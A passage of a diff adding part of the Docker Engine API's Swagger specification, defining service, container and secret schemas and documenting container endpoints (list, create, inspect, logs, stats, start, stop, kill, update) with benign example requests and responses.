+ type: "integer" + format: "int64" + MaxFailureRatio: + description: "The fraction of tasks that may fail during an update before the failure action is invoked, specified as a floating point number between 0 and 1." + type: "number" + default: 0 + Networks: + description: "Array of network names or IDs to attach the service to." + type: "array" + items: + type: "object" + properties: + Target: + type: "string" + Aliases: + type: "array" + items: + type: "string" + EndpointSpec: + $ref: "#/definitions/EndpointSpec" + EndpointPortConfig: + type: "object" + properties: + Name: + type: "string" + Protocol: + type: "string" + enum: + - "tcp" + - "udp" + TargetPort: + description: "The port inside the container." + type: "integer" + PublishedPort: + description: "The port on the swarm hosts." + type: "integer" + EndpointSpec: + description: "Properties that can be configured to access and load balance a service." + type: "object" + properties: + Mode: + description: "The mode of resolution to use for internal load balancing + between tasks." + type: "string" + enum: + - "vip" + - "dnsrr" + default: "vip" + Ports: + description: "List of exposed ports that this service is accessible on from the outside. Ports can only be provided if `vip` resolution mode is used." + type: "array" + items: + $ref: "#/definitions/EndpointPortConfig" + Service: + type: "object" + properties: + ID: + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/ServiceSpec" + Endpoint: + type: "object" + properties: + Spec: + $ref: "#/definitions/EndpointSpec" + Ports: + type: "array" + items: + $ref: "#/definitions/EndpointPortConfig" + VirtualIPs: + type: "array" + items: + type: "object" + properties: + NetworkID: + type: "string" + Addr: + type: "string" + UpdateStatus: + description: "The status of a service update." + type: "object" + properties: + State: + type: "string" + enum: + - "updating" + - "paused" + - "completed" + StartedAt: + type: "string" + format: "dateTime" + CompletedAt: + type: "string" + format: "dateTime" + Message: + type: "string" + example: + ID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Version: + Index: 19 + CreatedAt: "2016-06-07T21:05:51.880065305Z" + UpdatedAt: "2016-06-07T21:07:29.962229872Z" + Spec: + Name: "hopeful_cori" + TaskTemplate: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ForceUpdate: 0 + Mode: + Replicated: + Replicas: 1 + UpdateConfig: + Parallelism: 1 + FailureAction: "pause" + Monitor: 15000000000 + MaxFailureRatio: 0.15 + EndpointSpec: + Mode: "vip" + Ports: + - + Protocol: "tcp" + TargetPort: 6379 + PublishedPort: 30001 + Endpoint: + Spec: + Mode: "vip" + Ports: + - + Protocol: "tcp" + TargetPort: 6379 + PublishedPort: 30001 + Ports: + - + Protocol: "tcp" + TargetPort: 6379 + PublishedPort: 30001 + VirtualIPs: + - + NetworkID: "4qvuz4ko70xaltuqbt8956gd1" + Addr: "10.255.0.2/16" + - + NetworkID: "4qvuz4ko70xaltuqbt8956gd1" + Addr: "10.255.0.3/16" + ImageDeleteResponse: + type: "object" + properties: + Untagged: + description: "The image ID of an image that was untagged" + type: "string" + Deleted: + description: "The image ID of an image that was deleted" + type: "string" + ServiceUpdateResponse: + type: "object" + properties: + Warnings: + description: "Optional warning messages" + type: "array" + items: + type: "string" + example: + Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found" + ContainerSummary: + type: "array" + items: + type: "object" + properties: + Id: + description: "The ID of this container" + type: "string" + x-go-name: "ID" + Names: + description: "The names that this container has been given" + type: "array" + items: + type: "string" + Image: + description: "The name of the image used when creating this container" + type: "string" + ImageID: + description: "The ID of the image that this container was created from" + type: "string" + Command: + description: "Command to run when starting the container" + type: "string" + Created: + description: "When the container was created" + type: "integer" + format: "int64" + Ports: + description: "The ports exposed by this container" + type: "array" + items: + $ref: "#/definitions/Port" + SizeRw: + description: "The size of files that have been created or changed by this container" + type: "integer" + format: "int64" + SizeRootFs: + description: "The total size of all the files in this container" + type: "integer" + format: "int64" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + State: + description: "The state of this container (e.g. `Exited`)" + type: "string" + Status: + description: "Additional human-readable status of this container (e.g. `Exit 0`)" + type: "string" + HostConfig: + type: "object" + properties: + NetworkMode: + type: "string" + NetworkSettings: + description: "A summary of the container's network settings" + type: "object" + properties: + Networks: + type: "object" + additionalProperties: + $ref: "#/definitions/EndpointSettings" + Mounts: + type: "array" + items: + $ref: "#/definitions/Mount" + SecretSpec: + type: "object" + properties: + Name: + description: "User-defined name of the secret." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + Data: + description: "Base64-url-safe-encoded secret data" + type: "array" + items: + type: "string" + Secret: + type: "object" + properties: + ID: + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/ServiceSpec" +paths: + /containers/json: + get: + summary: "List containers" + operationId: "ContainerList" + produces: + - "application/json" + parameters: + - name: "all" + in: "query" + description: "Return all containers. By default, only running containers are shown" + type: "boolean" + default: false + - name: "limit" + in: "query" + description: "Return this number of most recently created containers, including non-running ones." + type: "integer" + - name: "size" + in: "query" + description: "Return the size of container as fields `SizeRw` and `SizeRootFs`." + type: "boolean" + default: false + - name: "filters" + in: "query" + description: | + Filters to process on the container list, encoded as JSON (a `map[string][]string`). For example, `{"status": ["paused"]}` will only return paused containers. + + Available filters: + - `exited=` containers with exit code of `` + - `status=`(`created`|`restarting`|`running`|`removing`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + - `id=` a container's ID + - `name=` a container's name + - `is-task=`(`true`|`false`) + - `ancestor`=(`[:]`, ``, or ``) + - `before`=(`` or ``) + - `since`=(`` or ``) + - `volume`=(`` or ``) + - `network`=(`` or ``) + - `health`=(`starting`|`healthy`|`unhealthy`|`none`) + type: "string" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/ContainerSummary" + examples: + application/json: + - Id: "8dfafdbc3a40" + Names: + - "/boring_feynman" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 1" + Created: 1367854155 + State: "Exited" + Status: "Exit 0" + Ports: + - PrivatePort: 2222 + PublicPort: 3333 + Type: "tcp" + Labels: + com.example.vendor: "Acme" + com.example.license: "GPL" + com.example.version: "1.0" + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.2" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:02" + Mounts: + - Name: "fac362...80535" + Source: "/data" + Destination: "/data" + Driver: "local" + Mode: "ro,Z" + RW: false + Propagation: "" + - Id: "9cd87474be90" + Names: + - "/coolName" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 222222" + Created: 1367854155 + State: "Exited" + Status: "Exit 0" + Ports: [] + Labels: {} + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.8" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:08" + Mounts: [] + - Id: "3176a2479c92" + Names: + - "/sleepy_dog" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 3333333333333333" + Created: 1367854154 + State: "Exited" + Status: "Exit 0" + Ports: [] + Labels: {} + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.6" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:06" + Mounts: [] + - Id: "4cb07b47f9fb" + Names: + - "/running_cat" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 444444444444444444444444444444444" + Created: 1367854152 + State: "Exited" + Status: "Exit 0" + Ports: [] + Labels: {} + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.5" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:05" + Mounts: [] + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Container"] + /containers/create: + post: + summary: "Create a container" + operationId: "ContainerCreate" + consumes: + - "application/json" + - "application/octet-stream" + produces: + - "application/json" + parameters: + - name: "name" + in: "query" + description: "Assign the specified name to the container. Must match `/?[a-zA-Z0-9_-]+`." + type: "string" + pattern: "/?[a-zA-Z0-9_-]+" + - name: "body" + in: "body" + description: "Container to create" + schema: + allOf: + - $ref: "#/definitions/Config" + - type: "object" + properties: + HostConfig: + $ref: "#/definitions/HostConfig" + NetworkingConfig: + description: "This container's networking configuration." + type: "object" + properties: + EndpointsConfig: + description: "A mapping of network name to endpoint configuration for that network." + type: "object" + additionalProperties: + $ref: "#/definitions/EndpointSettings" + example: + Hostname: "" + Domainname: "" + User: "" + AttachStdin: false + AttachStdout: true + AttachStderr: true + Tty: false + OpenStdin: false + StdinOnce: false + Env: + - "FOO=bar" + - "BAZ=quux" + Cmd: + - "date" + Entrypoint: "" + Image: "ubuntu" + Labels: + com.example.vendor: "Acme" + com.example.license: "GPL" + com.example.version: "1.0" + Volumes: + /volumes/data: {} + WorkingDir: "" + NetworkDisabled: false + MacAddress: "12:34:56:78:9a:bc" + ExposedPorts: + 22/tcp: {} + StopSignal: "SIGTERM" + StopTimeout: 10 + HostConfig: + Binds: + - "/tmp:/tmp" + Links: + - "redis3:redis" + Memory: 0 + MemorySwap: 0 + MemoryReservation: 0 + KernelMemory: 0 + NanoCPUs: 500000 + CpuPercent: 80 + CpuShares: 512 + CpuPeriod: 100000 + CpuRealtimePeriod: 1000000 + CpuRealtimeRuntime: 10000 + CpuQuota: 50000 + CpusetCpus: "0,1" + CpusetMems: "0,1" + MaximumIOps: 0 + MaximumIOBps: 0 + BlkioWeight: 300 + BlkioWeightDevice: + - {} + BlkioDeviceReadBps: + - {} + BlkioDeviceReadIOps: + - {} + BlkioDeviceWriteBps: + - {} + BlkioDeviceWriteIOps: + - {} + MemorySwappiness: 60 + OomKillDisable: false + OomScoreAdj: 500 + PidMode: "" + PidsLimit: -1 + PortBindings: + 22/tcp: + - HostPort: "11022" + PublishAllPorts: false + Privileged: false + ReadonlyRootfs: false + Dns: + - "8.8.8.8" + DnsOptions: + - "" + DnsSearch: + - "" + VolumesFrom: + - "parent" + - "other:ro" + CapAdd: + - "NET_ADMIN" + CapDrop: + - "MKNOD" + GroupAdd: + - "newgroup" + RestartPolicy: + Name: "" + MaximumRetryCount: 0 + AutoRemove: true + NetworkMode: "bridge" + Devices: [] + Ulimits: + - {} + LogConfig: + Type: "json-file" + Config: {} + SecurityOpt: [] + StorageOpt: {} + CgroupParent: "" + VolumeDriver: "" + ShmSize: 67108864 + NetworkingConfig: + EndpointsConfig: + isolated_nw: + IPAMConfig: + IPv4Address: "172.20.30.33" + IPv6Address: "2001:db8:abcd::3033" + LinkLocalIPs: + - "169.254.34.68" + - "fe80::3468" + Links: + - "container_1" + - "container_2" + Aliases: + - "server_x" + - "server_y" + + required: true + responses: + 201: + description: "Container created successfully" + schema: + type: "object" + required: [Id, Warnings] + properties: + Id: + description: "The ID of the created container" + type: "string" + x-nullable: false + Warnings: + description: "Warnings encountered when creating the container" + type: "array" + x-nullable: false + items: + type: "string" + examples: + application/json: + Id: "e90e34656806" + Warnings: [] + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 406: + description: "impossible to attach" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "conflict" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Container"] + /containers/{id}/json: + get: + summary: "Inspect a container" + description: "Return low-level information about a container." + operationId: "ContainerInspect" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Id: + description: "The ID of the container" + type: "string" + Created: + description: "The time the container was created" + type: "string" + Path: + description: "The path to the command being run" + type: "string" + Args: + description: "The arguments to the command being run" + type: "array" + items: + type: "string" + State: + description: "The state of the container." + type: "object" + properties: + Status: + description: "The status of the container. For example, `running` or `exited`." + type: "string" + Running: + description: "Whether this container is running." + type: "boolean" + Paused: + description: "Whether this container is paused." + type: "boolean" + Restarting: + description: "Whether this container is restarting." + type: "boolean" + OOMKilled: + description: "Whether this container has been killed because it ran out of memory." + type: "boolean" + Dead: + type: "boolean" + Pid: + description: "The process ID of this container" + type: "integer" + ExitCode: + description: "The last exit code of this container" + type: "integer" + Error: + type: "string" + StartedAt: + description: "The time when this container was last started." + type: "string" + FinishedAt: + description: "The time when this container last exited." + type: "string" + Image: + description: "The container's image" + type: "string" + ResolvConfPath: + type: "string" + HostnamePath: + type: "string" + HostsPath: + type: "string" + LogPath: + type: "string" + Node: + description: "TODO" + type: "object" + Name: + type: "string" + RestartCount: + type: "integer" + Driver: + type: "string" + MountLabel: + type: "string" + ProcessLabel: + type: "string" + AppArmorProfile: + type: "string" + ExecIDs: + type: "string" + HostConfig: + $ref: "#/definitions/HostConfig" + GraphDriver: + $ref: "#/definitions/GraphDriver" + SizeRw: + description: "The size of files that have been created or changed by this container." + type: "integer" + format: "int64" + SizeRootFs: + description: "The total size of all the files in this container." + type: "integer" + format: "int64" + Mounts: + type: "array" + items: + $ref: "#/definitions/MountPoint" + Config: + $ref: "#/definitions/Config" + NetworkSettings: + $ref: "#/definitions/NetworkConfig" + examples: + application/json: + AppArmorProfile: "" + Args: + - "-c" + - "exit 9" + Config: + AttachStderr: true + AttachStdin: false + AttachStdout: true + Cmd: + - "/bin/sh" + - "-c" + - "exit 9" + Domainname: "" + Env: + - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + Hostname: "ba033ac44011" + Image: "ubuntu" + Labels: + com.example.vendor: "Acme" + com.example.license: "GPL" + com.example.version: "1.0" + MacAddress: "" + NetworkDisabled: false + OpenStdin: false + StdinOnce: false + Tty: false + User: "" + Volumes: + /volumes/data: {} + WorkingDir: "" + StopSignal: "SIGTERM" + StopTimeout: 10 + Created: "2015-01-06T15:47:31.485331387Z" + Driver: "devicemapper" + HostConfig: + MaximumIOps: 0 + MaximumIOBps: 0 + BlkioWeight: 0 + BlkioWeightDevice: + - {} + BlkioDeviceReadBps: + - {} + BlkioDeviceWriteBps: + - {} + BlkioDeviceReadIOps: + - {} + BlkioDeviceWriteIOps: + - {} + ContainerIDFile: "" + CpusetCpus: "" + CpusetMems: "" + CpuPercent: 80 + CpuShares: 0 + CpuPeriod: 100000 + CpuRealtimePeriod: 1000000 + CpuRealtimeRuntime: 10000 + Devices: [] + IpcMode: "" + LxcConf: [] + Memory: 0 + MemorySwap: 0 + MemoryReservation: 0 + KernelMemory: 0 + OomKillDisable: false + OomScoreAdj: 500 + NetworkMode: "bridge" + PidMode: "" + PortBindings: {} + Privileged: false + ReadonlyRootfs: false + PublishAllPorts: false + RestartPolicy: + MaximumRetryCount: 2 + Name: "on-failure" + LogConfig: + Type: "json-file" + Sysctls: + net.ipv4.ip_forward: "1" + Ulimits: + - {} + VolumeDriver: "" + ShmSize: 67108864 + HostnamePath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname" + HostsPath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts" + LogPath: "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log" + Id: "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39" + Image: "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2" + MountLabel: "" + Name: "/boring_euclid" + NetworkSettings: + Bridge: "" + SandboxID: "" + HairpinMode: false + LinkLocalIPv6Address: "" + LinkLocalIPv6PrefixLen: 0 + SandboxKey: "" + SecondaryIPAddresses: null + SecondaryIPv6Addresses: null + EndpointID: "" + Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + IPAddress: "" + IPPrefixLen: 0 + IPv6Gateway: "" + MacAddress: "" + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.2" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:12:00:02" + Path: "/bin/sh" + ProcessLabel: "" + ResolvConfPath: "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf" + RestartCount: 1 + State: + Error: "" + ExitCode: 9 + FinishedAt: "2015-01-06T15:47:32.080254511Z" + OOMKilled: false + Dead: false + Paused: false + Pid: 0 + Restarting: false + Running: true + StartedAt: "2015-01-06T15:47:32.072697474Z" + Status: "running" + Mounts: + - Name: "fac362...80535" + Source: "/data" + Destination: "/data" + Driver: "local" + Mode: "ro,Z" + RW: false + Propagation: "" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "size" + in: "query" + type: "boolean" + default: false + description: "Return the size of container as fields `SizeRw` and `SizeRootFs`" + tags: ["Container"] + /containers/{id}/top: + get: + summary: "List processes running inside a container" + description: "On Unix systems, this is done by running the `ps` command. This endpoint is not supported on Windows." + operationId: "ContainerTop" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Titles: + description: "The ps column titles" + type: "array" + items: + type: "string" + Processes: + description: "Each process running in the container, where each is process is an array of values corresponding to the titles" + type: "array" + items: + type: "array" + items: + type: "string" + examples: + application/json: + Titles: + - "UID" + - "PID" + - "PPID" + - "C" + - "STIME" + - "TTY" + - "TIME" + - "CMD" + Processes: + - + - "root" + - "13642" + - "882" + - "0" + - "17:03" + - "pts/0" + - "00:00:00" + - "/bin/bash" + - + - "root" + - "13735" + - "13642" + - "0" + - "17:06" + - "pts/0" + - "00:00:00" + - "sleep 10" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "ps_args" + in: "query" + description: "The arguments to pass to `ps`. For example, `aux`" + type: "string" + default: "-ef" + tags: ["Container"] + /containers/{id}/logs: + get: + summary: "Get container logs" + description: | + Get `stdout` and `stderr` logs from a container. + + Note: This endpoint works only for containers with the `json-file` or `journald` logging driver. + operationId: "ContainerLogs" + responses: + 101: + description: "logs returned as a stream" + schema: + type: "string" + format: "binary" + 200: + description: "logs returned as a string in response body" + schema: + type: "string" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "follow" + in: "query" + description: | + Return the logs as a stream. + + This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach). + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Return logs from `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Return logs from `stderr`" + type: "boolean" + default: false + - name: "since" + in: "query" + description: "Only return logs since this time, as a UNIX timestamp" + type: "integer" + default: 0 + - name: "timestamps" + in: "query" + description: "Add timestamps to every log line" + type: "boolean" + default: false + - name: "tail" + in: "query" + description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines." + type: "string" + default: "all" + tags: ["Container"] + /containers/{id}/changes: + get: + summary: "Get changes on a container’s filesystem" + description: | + Returns which files in a container's filesystem have been added, deleted, or modified. The `Kind` of modification can be one of: + + - `0`: Modified + - `1`: Added + - `2`: Deleted + operationId: "ContainerChanges" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + type: "object" + properties: + Path: + description: "Path to file that has changed" + type: "string" + Kind: + description: "Kind of change" + type: "integer" + enum: + - 0 + - 1 + - 2 + examples: + application/json: + - Path: "/dev" + Kind: 0 + - Path: "/dev/kmsg" + Kind: 1 + - Path: "/test" + Kind: 1 + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/export: + get: + summary: "Export a container" + description: "Export the contents of a container as a tarball." + operationId: "ContainerExport" + produces: + - "application/octet-stream" + responses: + 200: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/stats: + get: + summary: "Get container stats based on resource usage" + description: | + This endpoint returns a live stream of a container’s resource usage statistics. + + The `precpu_stats` is the CPU statistic of last read, which is used for calculating the CPU usage percentage. It is not the same as the `cpu_stats` field. + operationId: "ContainerStats" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + examples: + application/json: + read: "2015-01-08T22:57:31.547920715Z" + pids_stats: + current: 3 + networks: + eth0: + rx_bytes: 5338 + rx_dropped: 0 + rx_errors: 0 + rx_packets: 36 + tx_bytes: 648 + tx_dropped: 0 + tx_errors: 0 + tx_packets: 8 + eth5: + rx_bytes: 4641 + rx_dropped: 0 + rx_errors: 0 + rx_packets: 26 + tx_bytes: 690 + tx_dropped: 0 + tx_errors: 0 + tx_packets: 9 + memory_stats: + stats: + total_pgmajfault: 0 + cache: 0 + mapped_file: 0 + total_inactive_file: 0 + pgpgout: 414 + rss: 6537216 + total_mapped_file: 0 + writeback: 0 + unevictable: 0 + pgpgin: 477 + total_unevictable: 0 + pgmajfault: 0 + total_rss: 6537216 + total_rss_huge: 6291456 + total_writeback: 0 + total_inactive_anon: 0 + rss_huge: 6291456 + hierarchical_memory_limit: 67108864 + total_pgfault: 964 + total_active_file: 0 + active_anon: 6537216 + total_active_anon: 6537216 + total_pgpgout: 414 + total_cache: 0 + inactive_anon: 0 + active_file: 0 + pgfault: 964 + inactive_file: 0 + total_pgpgin: 477 + max_usage: 6651904 + usage: 6537216 + failcnt: 0 + limit: 67108864 + blkio_stats: {} + cpu_stats: + cpu_usage: + percpu_usage: + - 8646879 + - 24472255 + - 36438778 + - 30657443 + usage_in_usermode: 50000000 + total_usage: 100215355 + usage_in_kernelmode: 30000000 + system_cpu_usage: 739306590000000 + throttling_data: + periods: 0 + throttled_periods: 0 + throttled_time: 0 + precpu_stats: + cpu_usage: + percpu_usage: + - 8646879 + - 24350896 + - 36438778 + - 30657443 + usage_in_usermode: 50000000 + total_usage: 100093996 + usage_in_kernelmode: 30000000 + system_cpu_usage: 9492140000000 + throttling_data: + periods: 0 + throttled_periods: 0 + throttled_time: 0 + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "stream" + in: "query" + description: "Stream the output. If false, the stats will be output once and then it will disconnect." + type: "boolean" + default: true + tags: ["Container"] + /containers/{id}/resize: + post: + summary: "Resize a container TTY" + description: "Resize the TTY for a container. You must restart the container for the resize to take effect." + operationId: "ContainerResize" + consumes: + - "application/octet-stream" + produces: + - "text/plain" + responses: + 200: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "cannot resize container" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "h" + in: "query" + description: "Height of the tty session in characters" + type: "integer" + - name: "w" + in: "query" + description: "Width of the tty session in characters" + type: "integer" + tags: ["Container"] + /containers/{id}/start: + post: + summary: "Start a container" + operationId: "ContainerStart" + responses: + 204: + description: "no error" + 304: + description: "container already started" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "detachKeys" + in: "query" + description: "Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`." + type: "string" + tags: ["Container"] + /containers/{id}/stop: + post: + summary: "Stop a container" + operationId: "ContainerStop" + responses: + 204: + description: "no error" + 304: + description: "container already stopped" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "t" + in: "query" + description: "Number of seconds to wait before killing the container" + type: "integer" + tags: ["Container"] + /containers/{id}/restart: + post: + summary: "Restart a container" + operationId: "ContainerRestart" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "t" + in: "query" + description: "Number of seconds to wait before killing the container" + type: "integer" + tags: ["Container"] + /containers/{id}/kill: + post: + summary: "Kill a container" + description: "Send a POSIX signal to a container, defaulting to killing to the container." + operationId: "ContainerKill" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "signal" + in: "query" + description: "Signal to send to the container as an integer or string (e.g. `SIGINT`)" + type: "string" + default: "SIGKILL" + tags: ["Container"] + /containers/{id}/update: + post: + summary: "Update a container" + description: "Change various configuration options of a container without having to recreate it." + operationId: "ContainerUpdate" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 200: + description: "The container has been updated." + schema: + type: "object" + properties: + Warnings: + type: "array" + items: + type: "string" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "update" + in: "body" + required: true + schema: + allOf: + - $ref: "#/definitions/Resources" + - type: "object" + properties: + RestartPolicy: + $ref: "#/definitions/RestartPolicy" + example: + BlkioWeight: 300 + CpuShares: 512 + CpuPeriod: 100000 + CpuQuota: 50000 + CpuRealtimePeriod: 1000000 + CpuRealtimeRuntime: 10000 + CpusetCpus: "0,1" + CpusetMems: "0" + 